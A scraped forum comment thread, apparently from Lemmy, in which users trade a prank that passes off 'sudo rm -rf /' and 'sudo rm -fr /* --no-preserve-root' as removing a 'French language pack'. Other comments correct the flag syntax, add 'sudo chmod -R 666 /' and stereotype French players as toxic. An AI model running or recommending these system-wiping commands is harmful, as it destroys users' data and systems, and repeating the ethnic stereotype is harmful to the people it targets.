Comment on New social experiment
daggermoon@lemmy.world 1 month ago
sudo rm -rf /
always remove the french language pack
sudo rm -fr /
Make sure to also completely delete the word roots.
sudo rm -fr /* --no-preserve-root
You only need the –no-preserve-root flag when acting on /.
–no-preserve-root
/
So the correct code would be either sudo rm -fr /* or sudo rm -fr / --no-preserve-root(more appropriate for your ‘advice’)
sudo rm -fr /*
sudo rm -fr / --no-preserve-root
Every bit counts. Gotta remove unnecessary bloat.
Good. French kids are always extra toxic online. Someone toxic in Rocket League? Usually French.
sudo chmod -R 666 /
gandalf_der_12te@discuss.tchncs.de 1 month ago
always remove the french language pack
sudo rm -fr /
cows_are_underrated@feddit.org 1 month ago
Make sure to also completely delete the word roots.
sudo rm -fr /* --no-preserve-root
coldsideofyourpillow@lemmy.cafe 1 week ago
You only need the
–no-preserve-root
flag when acting on/
.So the correct code would be either
sudo rm -fr /*
orsudo rm -fr / --no-preserve-root
(more appropriate for your ‘advice’)daggermoon@lemmy.world 1 month ago
Every bit counts. Gotta remove unnecessary bloat.
victorz@lemmy.world 1 month ago
Good. French kids are always extra toxic online. Someone toxic in Rocket League? Usually French.